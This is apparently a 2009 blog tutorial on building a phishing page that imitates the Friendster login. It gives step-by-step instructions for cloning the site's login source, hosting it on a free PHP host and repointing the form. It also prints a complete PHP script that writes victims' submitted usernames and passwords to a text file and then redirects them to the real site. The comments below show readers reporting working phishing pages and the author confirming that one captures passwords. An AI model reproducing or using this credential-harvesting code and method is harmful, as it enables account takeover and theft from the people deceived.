Now, i will try to make phising tutorial in english. This will be a basic tutorial on how to make a phisher.
What is a phisher?
A phisher is a fake login page used to gain access to someones account. When someone logs into the fake login page, there password is sent to you.
In order to make a phisher, you need a web hosting site which support php. I recommend Ripway then sign up with a free account.
After you create that page, go to the website you will make a phisher for, I will use Friendster for example. Make sure you are logged out and and attempt to login with random email & password. You will get an error saying you must log-in with valid username. From there right-click the page, and click View Source. Copy and paste what has popped-up.
Creating Phish File
Once you have that copied, go and login to your ripway account. Create a new file on “Create Text File” and title it login.htm then paste your Source Code you’ve copied before. Save it.
Now create another file, title it fish.php And inside, paste this code:
<?php
header("Location: http://www.friendster.com");
$handle = fopen("thepasses.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
The http://www.friendster.com is what the page goes to after the victim logs in, change that to what desired then save the file.
Go back to your login.htm file and click edit. Press CTRL+F and type in action= in the box. Keep pressing find until you find something that says action=(something that has to do with logging in). Replace that with fish.php.
Last, create a new file, title it thepasses.txt and leave it blank. This file will record the victim’s entry on login.htm
Congratulations, you have a phisher!
and you can see the password here (try another browser if you can’t see it)
PASSWORD PREVIEW
NOTE: FOR ALL, PLEASE USE IT WISELY!
Related posts:
- Hack Facebook Tutorial
I see there are a lot of people who ask:... - Way to Sending Fake Email
Well, i see that there was many people asking for... - Step by Step How To Upgrade Wordpress
WordPress is a free blogging tool that is used for... - Jumlah Comment Friendster Berlipat Ganda! (EXPIRED!)
Buat yang masih doyan main Friendster, bosen sama jumlah comment... - Buka Private Photo Friendster (EXPIRED!)
>> Pertama-tama, buka profil friendster korban (dalam hal ini, saya...













June 27th, 2009 at 5:49 am
uh i it wOrk’z nOw
thnx sO much
i try 2 delete the “method=post”
and it wOrkz
TY .. mOre pOwer 2 ur sitE
June 13th, 2009 at 3:43 am
it works, yeah…. thanks so much
April 15th, 2009 at 8:07 pm
try the site http://www.markyctrigger.com
April 12th, 2009 at 1:32 am
what the F!!! i made it… nyahahahaha!!!
thanks bro!!
long live cremonti!!!
April 11th, 2009 at 7:39 pm
hey man, it works, but there is nothing show on my passtext.txt, i think, its same case as pablopicasso0129. i just want to know how he fixed his phisher. or if it is realy working properly.
here is my site
http://h1.ripway.com/blackmess/login.htm
thanks man.
April 11th, 2009 at 7:03 pm
hi cremonti, i’ve try this kind of phising, i made a successful copy of the friendster log-in but when i try it, its comes like an error. how can i fix this.
thanks in advance.
April 6th, 2009 at 11:41 pm
hi cremonti. i need your help. this is my login. how can i redirect it from friendster? and where should i paste it?
March 2nd, 2009 at 6:12 pm
CREMONTI EXPLAin HOW TO USED REDIRECT JAVASCRIPT IN FRIENDSTER PLZZZZZ
March 1st, 2009 at 4:29 am
hi cremonti…pls help me, i kip on trying but nothing shows on my passtxt..whew..help me plsss
cremonti Reply:
March 2nd, 2009 at 3:13 am
your phiser url http://h1.ripway.com/mykie/login.htm working properly.
i’ve try and the pass recorded successfully.
February 28th, 2009 at 8:10 pm
IT WORKS BUT LAST QUESTION CREMONTI HOW DO I THE APPLY THE DIRECT LINK IN FRIENDSTER PLZZZZ TEACH ME GIVE ME A FULL INSTRUCTION
cremonti Reply:
March 2nd, 2009 at 3:14 am
try using redirect javascript. do you know how to use it?